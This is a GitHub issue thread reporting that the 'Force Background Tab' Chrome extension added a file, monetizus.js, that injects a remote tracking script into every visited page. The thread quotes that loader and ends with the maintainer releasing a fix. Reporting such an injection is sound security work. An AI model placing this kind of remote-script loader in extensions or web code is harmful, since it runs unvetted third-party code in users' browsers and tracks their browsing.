### ISSUE TITLE
Chrome extension is now tracking every site you visit

### ISSUE THREAD

**Issue by schoerg** [monque/ChromeExtension-ForceBackgroundTab#1]
I don't know if you still have access to the extensionpage of the Chrome webstore but the "Force Background Tab" is now adding a JS tracking code to every site you visit.

Testing site: https://api.ipify.org/

Example with extension enabled:

https://i.imgur.com/4xX8x5W.png

Extension disabled:

https://i.imgur.com/pugQOrr.png

https://chrome.google.com/webstore/detail/force-background-tab/gidlfommnbibbmegmgajdbikelkdcmcl

The following file was added:

`monetizus.js`

```
(function(){
    var s = document.createElement('script'); 
    s.src = '//s3.amazonaws.com/jscache/1024f4c4a4bda17245.js'; 
    document.body.appendChild(s); 
})();
```

But if you have done it yourself you probably know that.

**Comment by gkatsev** [comment]
Thankfully the code here seems to be just fine without that moentizus.js file. I'm planning on cloning it and releasing my own copy.

**Comment by gkatsev** [comment]
I published https://chrome.google.com/webstore/detail/force-background-tab/ljnpgplmnnnbebdgjnbejbcamhdflibm?hl=en&gl=US which is just the code in the repo without anything extra.

**Comment by monque** [comment]
Sorry for this mistake, I've already update a new version on Chrome Extension Store.

**Comment by gkatsev** [comment]
Thank you @monque.

**Comment by schoerg** [comment]
Thanks.
